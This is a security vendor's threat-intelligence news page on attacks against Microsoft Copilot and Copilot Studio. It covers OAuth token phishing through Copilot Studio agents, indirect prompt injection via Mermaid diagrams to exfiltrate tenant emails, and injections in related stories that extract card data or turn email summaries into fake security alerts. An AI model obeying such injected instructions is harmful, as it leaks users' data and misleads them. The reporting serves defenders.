Skip to main content
Mallory
Mallory

Novel Attacks Exploit Microsoft Copilot and Copilot Studio for Data Theft and OAuth Token Compromise

Updated October 25, 2025 at 07:00 PM2 sources

Get Ahead of Threats Like This

Know if you're exposed — before adversaries strike.

Security researchers have identified two distinct attack techniques targeting Microsoft's AI-powered platforms. The first, dubbed CoPhish, leverages Microsoft Copilot Studio agents to deliver fraudulent OAuth consent requests through legitimate Microsoft domains, enabling attackers to steal OAuth tokens. By customizing Copilot Studio chatbots and exploiting the platform's "demo website" feature, attackers can trick users into authenticating with malicious applications, potentially granting unauthorized access to sensitive resources. Microsoft has acknowledged the issue and is working on product updates to mitigate the risk, emphasizing the need for organizations to strengthen governance and consent processes.

Separately, a vulnerability in Microsoft 365 Copilot was discovered that allowed attackers to use indirect prompt injection via Mermaid diagrams to exfiltrate sensitive tenant data, such as emails. By embedding malicious instructions in seemingly benign prompts, attackers could manipulate Copilot to retrieve and encode confidential information. Although Microsoft has since patched this flaw, the incident highlights the emerging risks associated with integrating AI assistants and third-party tools, as well as the challenges in securing complex, automated workflows within enterprise environments.

Sources

October 25, 2025 at 12:00 AM
October 24, 2025 at 06:58 PM

Related Stories

OAuth Phishing and Malicious Application Abuse in Microsoft 365 Environments

Attackers are increasingly leveraging Microsoft Copilot Studio to facilitate OAuth phishing attacks by exploiting its ability to host customizable agents and redirect users to arbitrary URLs. Security researchers have demonstrated that Copilot Studio agents, which appear as legitimate Microsoft services, can be configured with a 'Login' button that redirects unsuspecting users to malicious OAuth consent pages. This technique increases the credibility of phishing attempts, as the initial interaction occurs on a trusted Microsoft domain, making it more likely for users to grant permissions to malicious applications. Once a user consents, attackers can exfiltrate OAuth tokens, granting them persistent access to sensitive data and services within the victim's Microsoft 365 environment. The flexibility of Copilot Studio, while beneficial for legitimate automation, also provides attackers with a powerful tool to craft convincing phishing lures and automate token exfiltration. Security experts emphasize the importance of reviewing and tightening Entra ID application consent policies, especially in light of recent and upcoming policy updates from Microsoft. Despite improvements in consent policy enforcement, risks remain, particularly when users with elevated privileges, such as Application Administrators, are able to grant broad permissions. In parallel, security researchers have highlighted the prevalence of hidden malicious OAuth applications within Microsoft 365 tenants. Open-source tools like Cazadora have been developed to help administrators audit their environments for suspicious applications, such as those with anomalous names or reply URLs. Common indicators of malicious OAuth apps include names mimicking user accounts, generic test names, or non-alphanumeric strings, as well as reply URLs pointing to local loopback addresses. The discovery of even a single suspicious app often signals a broader compromise, underscoring the need for comprehensive audits. Security teams are urged to regularly inspect both Enterprise Applications and Application Registrations for signs of abuse. The combination of sophisticated phishing techniques using Copilot Studio and the widespread presence of malicious OAuth apps represents a significant threat to Microsoft 365 environments. Proactive monitoring, user education, and strict consent policies are critical to mitigating these risks. Organizations should remain vigilant for new attack vectors that exploit trusted cloud services. The evolving landscape of OAuth-based attacks requires continuous adaptation of security controls and incident response strategies. Collaboration between security researchers and cloud service providers is essential to stay ahead of emerging threats. The integration of automation and AI-driven services like Copilot Studio into enterprise environments necessitates a reevaluation of traditional security assumptions. As attackers continue to innovate, defenders must leverage both technical controls and threat intelligence to protect their organizations.

4 months ago

Prompt Injection Vulnerabilities in Microsoft Copilot Studio AI Agents

Security researchers demonstrated that Microsoft Copilot Studio's no-code AI agent platform is susceptible to prompt injection attacks, allowing unauthorized access to sensitive business data. By leveraging the platform's ease of use, even non-technical employees can create AI agents that integrate with critical business systems such as SharePoint, Outlook, and Teams. In controlled tests, researchers were able to extract customer credit card information and manipulate booking systems to create fraudulent transactions, such as booking a $0 vacation, by issuing carefully crafted prompts to the AI agents. The core risk arises from the democratization of AI agent creation, which, while boosting productivity, also increases the attack surface for organizations. The lack of technical safeguards and the inherent vulnerabilities of large language models (LLMs) make it easy for attackers or even well-meaning users to bypass intended security controls. Experts warn that these agentic tools, if not properly secured, can lead to significant data exposure and workflow hijacking, underscoring the urgent need for robust security practices and oversight when deploying AI-powered automation in business environments.

3 months ago
Microsoft Copilot Security Research: Prompt-Injection Phishing Risk and Copilot Studio Audit-Logging Gaps

Microsoft Copilot Security Research: Prompt-Injection Phishing Risk and Copilot Studio Audit-Logging Gaps

Security researchers reported two distinct Microsoft Copilot-related risks: (1) **cross prompt injection** against *Microsoft Copilot* email summarization surfaces that can cause attacker-supplied text in an email to be treated like instructions, shaping the summary into a convincing in-product “security alert” and creating a phishing path that does not rely on attachments or macros; and (2) **audit-logging gaps in Microsoft Copilot Studio** where certain administrative actions for Copilot Studio agents (e.g., around sharing, authentication, logging, and publication) were not consistently recorded in Microsoft 365’s Unified Audit Log, potentially reducing defenders’ ability to detect malicious or unauthorized agent changes. Permiso described how Copilot’s behavior varies across Outlook’s inline *Summarize* experience, the Outlook Copilot pane/add-in, and Teams-based summarization, with the core risk being **trust transfer**—users may treat Copilot output as system-generated even when it is attacker-influenced—and warned that retrieval across Microsoft 365 (Teams/OneDrive/SharePoint) could amplify impact if chained. Datadog Security Labs stated it reported Copilot Studio logging issues to **MSRC**, that Microsoft remediated logging for the affected events by **October 5, 2025**, and that Datadog later observed a **regression** where some events again failed to log consistently, which it also reported to Microsoft.

5 days ago

Get Ahead of Threats Like This

Mallory continuously monitors global threat intelligence and correlates it with your attack surface. Know if you're exposed — before adversaries strike.

Novel Attacks Exploit Microsoft Copilot and Copilot Studio for Data Theft and OAuth Token Compromise | Mallory